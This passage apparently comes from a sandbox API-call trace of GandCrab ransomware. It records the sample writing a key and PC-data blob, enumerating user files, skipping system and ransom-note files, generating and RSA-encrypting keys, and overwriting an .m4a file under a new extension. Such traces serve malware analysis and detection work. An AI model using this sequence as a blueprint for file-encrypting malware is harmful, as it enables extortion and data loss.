\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0093.301] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0093.302] CloseHandle (hObject=0x2ac) returned 1 [0093.302] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.302] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.302] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x26, wMilliseconds=0x267)) [0093.303] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.303] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.303] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.303] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\d2ca4a09d2ca4deb61a.lock") returned 60 [0093.303] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0093.303] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.304] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.304] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\") returned 36 [0093.304] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\*" [0093.304] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x5032f8 [0093.304] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.304] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.305] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.305] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.305] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.305] lstrcmpW (lpString1="a-jg.m4a", lpString2=".") returned 1 [0093.305] lstrcmpW (lpString1="a-jg.m4a", lpString2="..") returned 1 [0093.305] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\", lpString2="a-jg.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\a-jg.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\a-jg.m4a" [0093.305] lstrlenW (lpString=".titwmvjl") returned 9 [0093.305] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\a-jg.m4a") returned 44 [0093.305] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.305] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\a-jg.m4a.titwmvjl") returned 53 [0093.305] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\a-jg.m4a") returned 44 [0093.305] lstrlenW (lpString=".m4a") returned 4 [0093.305] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.306] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".m4a ") returned 5 [0093.306] lstrcmpiW (lpString1=".m4a", lpString2=".titwmvjl") returned -1 [0093.306] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.306] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\a-jg.m4a") returned 44 [0093.306] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\a-jg.m4a") returned 44 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="desktop.ini") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="autorun.inf") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="ntuser.dat") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="iconcache.db") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="bootsect.bak") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="boot.ini") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="ntuser.dat.log") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="thumbs.db") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="KRAB-DECRYPT.html") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="CRAB-DECRYPT.html") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="KRAB-DECRYPT.txt") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="CRAB-DECRYPT.txt") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="ntldr") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="NTDETECT.COM") returned -1 [0093.306] lstrcmpiW (lpString1="a-jg.m4a", lpString2="Bootfont.bin") returned -1 [0093.306] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\a-jg.m4a") returned 44 [0093.306] lstrlenW (lpString=".m4a") returned 4 [0093.306] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.307] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".m4a ") returned 5 [0093.307] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.307] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.307] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\a-jg.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\a-jg.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0093.307] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.307] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0093.308] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.308] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.308] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.309] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.309] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.309] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.309] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0093.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.310] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.310] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.310] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.310] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.310] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.311] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.311] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0093.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.311] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.311] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.311] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.312] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503278) returned 1 [0093.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.312] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.312] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.312] GetLastError () returned 0x0 [0093.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.312] CryptDestroyKey (hKey=0x503278) returned 1 [0093.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.313] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.313] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.313] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.313] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.313] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503338) returned 1 [0093.313] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.313] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.313] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.314] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.314] GetLastError () returned 0x0 [0093.314] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.314] CryptDestroyKey (hKey=0x503338) returned 1 [0093.314] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.314] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.314] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.314] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.315] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x1970, lpOverlapped=0x0) returned 1 [0093.337] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffe690, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.337] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1970, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x1970, lpOverlapped=0x0) returned 1 [0093.338] 